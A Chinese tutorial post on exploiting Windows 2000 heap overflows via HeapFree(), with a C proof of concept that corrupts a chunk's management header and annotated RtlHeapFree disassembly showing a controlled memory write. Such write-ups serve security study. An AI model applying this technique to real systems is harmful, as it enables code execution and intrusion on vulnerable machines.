|
Windows下的Heap溢出的文章现在并不多,isno写过一篇,我看了受益匪浅,但他实现的利用方法是
“假设我们分配完buf1之后向其中拷贝内容,拷贝的内容大小超过buf1的大小,即16字节,就会发生溢 出,当如果我们覆盖掉了那两个4字节的指针,而下一次分配buf2之前又没有把 |
|
在Windows下也是可以像Linux下那样用free()对Heap溢出进行利用,在Windows下用HeapAlloc()函数
分配内存后的内存和映象和结构我就不说了,可以看isno的文档,在HeapAlloc()分配完内存后,每一块 内存的前面都包含一个8字节的管理区,这个管理区应该是下面的样子: 0 4 5 6 8 |不祥|Field|Flags|不祥| 这8个字节用于HeapFree时使用,假设我们分配2个32字节的内存,当向第一个32字节内存填充达38字 节内容时,这时,覆盖了第二个32字节内存的管理区的6个字节,如果这6个字节经过我们精心设计,我们 时可以控制程序的流向的。 下面代码演示分配2个32字节的内存,在调用HeapFree时发生错误: #include <string.h> #include <stdio.h> #include <windows.h> #include <malloc.h> int main (int argc, char *argv[]) { HANDLE hHeap; char *buf1, *buf2; //一个32字节的缓冲区 char mybuf[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; //在进程的默认HEAP当中分配内存 hHeap=GetProcessHeap(); //分配两块32字节内存 buf1 = HeapAlloc(hHeap, 0, 32); buf2 = HeapAlloc(hHeap, 0, 32); //把32字节的mybuf拷贝到16字节的buf1里面 strcpy(buf1,mybuf); //更改管理结构 memset(buf1+32,0x99,1); memset(buf1+32+5,0xff,1); //释放内存 HeapFree(hHeap, 0, buf1); //这里会出错 HeapFree(hHeap, 0, buf2); return 0; } 当程序在内存未释放前,内存映象是这样的: 0 32 40 |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|0x99,0x00,0x05,0x00,0x00,0xff,0xxx,0xxx| 我们可以看到,管理区的前6个字节被我们改写了 第一个字节:必须大于0x80,我们改成0x99 第四个字节:必须小于0x40 第五个字节:第0和第3位必须置位,例如可以改成0x09,我们这里改成0xFF 我们可以分析_RtlHeapFree()的反汇编代码,这样可以知道为什么要这样改: 77FC9C97 mov al,byte ptr [esi+5] 77FC9C9A test al,1 //检查管理区的第5字节的第0位是否置位 77FC9C9C je 77FC9019 77FC9CA2 test dl,7 77FC9CA5 jne 77FC9019 77FC9CAB cmp byte ptr [esi+4],40h //检查管理区的第4字节是否小于0x40 77FC9CAF jae 77FC9019 77FC9CB5 or dword ptr [ebp-4],0FFh 77FC9CB9 mov ecx,dword ptr [edi+580h] 77FC9CBF test ecx,ecx 77FC9CC1 je 77FC9D03 77FC9CC3 cmp dword ptr [edi+584h],0 77FC9CCA jne 77FC9D03 77FC9CCC test al,8 //检查管理区的第5字节的第0位是否置位 77FC9CCE jne 77FC9D03 77FC9CD0 movzx eax,word ptr [esi] 77FC9CD3 mov dword ptr [ebp-30h],eax 77FC9CD6 cmp eax,80h //检查管理区的第1字节的是否大于0x80 77FC9CDB jae 77FC9D03 //我们需要跳到这个地址 77FC9CDD push edx 77FC9CDE lea eax,[eax+eax*2] 77FC9CE1 shl eax,4 77FC9CE4 add eax,ecx 77FC9CE6 push eax 77FC9CE7 call 77F89846 77FC9CEC test al,al 77FC9CEE je 77FC9D03 77FC9CF0 mov al,1 77FC9CF2 mov ecx,dword ptr [ebp-10h] 77FC9CF5 mov dword ptr fs:[0],ecx 77FC9CFC pop edi 77FC9CFD pop esi 77FC9CFE pop ebx 77FC9CFF leave 77FC9D00 ret 0Ch 用release方式编译上面代码运行,弹出如下窗口:0x77fca200指令引用的0x41414141内存不能为written。 这个41414141在那里呢?我们用softice跟踪可以发现如下代码: 77FCA1EF add esi,-18h //这时esi指向管理区的入口处,也就是buf1-18h处 (这个18在不同的版本的Windows 2000上是不一样的,请根据不同的Windows 2000版本处理),那里正是我们可以控制的 77FCA1F2 mov dword ptr [ebp-64h],esi 77FCA1F5 mov eax,dword ptr [esi] 77FCA1F7 mov dword ptr [ebp-68h],eax 77FCA1FA mov esi,dword ptr [esi+4] 77FCA1FD mov dword ptr [ebp-6Ch],esi 77FCA200 mov dword ptr [esi],eax //写内存,发生错误 77FCA202 mov dword ptr [eax+4],esi 有了上面的基础,我们就可以利用HeapFree()函数了,^_^ 至于具体攻击程序的编写,请参考isno写的文章《Windows下的HEAP溢出及其利用》,方法是一样的。 |
扫一扫
11-12
526
526
11-11
502
502
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
